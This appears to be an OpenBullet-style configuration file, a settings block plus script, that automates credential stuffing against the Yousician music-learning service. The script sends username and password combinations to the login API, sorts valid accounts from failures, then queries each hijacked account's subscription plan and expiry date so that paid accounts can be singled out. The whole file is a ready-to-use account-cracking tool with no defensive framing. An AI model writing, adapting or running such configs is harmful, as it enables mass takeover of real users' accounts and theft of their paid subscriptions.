[SETTINGS]
{
  "Name": "Yousician",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2020-08-16T06:03:51.2116953-05:00",
  "AdditionalInfo": "",
  "Author": "P6AK",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION Base64Encode "<USER>:<PASS>" -> VAR "1" 

REQUEST POST "https://api.yousician.com/login" 
  CONTENT "{\"source\":\"\",\"platform\":\"Android\",\"variants\":\"\",\"gdpr_introduced\":true,\"app_type\":\"ProfilePages\"}" 
  CONTENTTYPE "application/json" 
  HEADER "origin: https://account.yousician.com" 
  HEADER "referer: https://account.yousician.com/login?continue=%2F" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" 
  HEADER "x-application-name: AccountSite" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "authorization: Basic <1>" 
  HEADER "content-length: 97" 
  HEADER "content-type: application/json" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{}" 
  KEYCHAIN Failure OR 
    KEY "You have to login with proper credentials" 

REQUEST GET "https://api.yousician.com/payment/subscription" 
  
  HEADER "origin: https://account.yousician.com" 
  HEADER "referer: https://account.yousician.com/" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" 
  HEADER "x-application-name: AccountSite" 

PARSE "<SOURCE>" JSON "core_plan_name" CreateEmpty=FALSE -> CAP "Subscription" 

PARSE "<SOURCE>" JSON "period_end_date" -> VAR "2" 

FUNCTION Replace "00:00:00+00:00" "" "<2>" -> VAR "3" 

PARSE "<SOURCE>" REGEX "" "" CreateEmpty=FALSE -> CAP "Expiry" "" " <3>" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Subscription>" DoesNotExist 
  KEYCHAIN Success OR 
    KEY "<Subscription>" Exists 

